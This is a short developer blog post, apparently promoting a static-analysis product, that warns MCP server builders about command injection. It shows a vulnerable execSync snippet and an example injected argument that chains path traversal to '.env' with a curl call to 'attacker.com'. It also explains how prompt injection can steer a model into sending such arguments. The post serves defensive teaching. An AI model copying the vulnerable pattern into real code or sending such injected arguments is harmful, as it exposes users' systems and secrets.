Your MCP Server Is Probably Vulnerable — Here's What to Check

VitorLourenco — Tue, 10 Mar 2026 15:18:02 +0000

Most MCP servers I've seen are doing this:

server.tool("run_script", async ({ filename }) => {
 execSync(`node scripts/${filename}`);
 });

That's command injection. The parameter comes from an AI model — which can be manipulated through prompt injection in its context to send ../../.env && curl attacker.com.

The mental model most developers are missing: an AI model is an untrusted caller. The same validation discipline you apply to HTTP query parameters applies to MCP tool arguments. The threat model is identical — only the caller changed.

We just shipped 12 static analysis checks specifically for MCP servers:

command injection,
path traversal,
missing schema validation,
prompt injection via tool descriptions.

Runs automatically on JS, TS, and Python MCP code.
No config, no API key.

Full breakdown of what we detect and why it matters:
--> https://codeslick.dev/blog/mcp-server-security

If you're building MCP servers, this is worth 5 minutes.

DEV Community: VitorLourenco

Your MCP Server Is Probably Vulnerable — Here's What to Check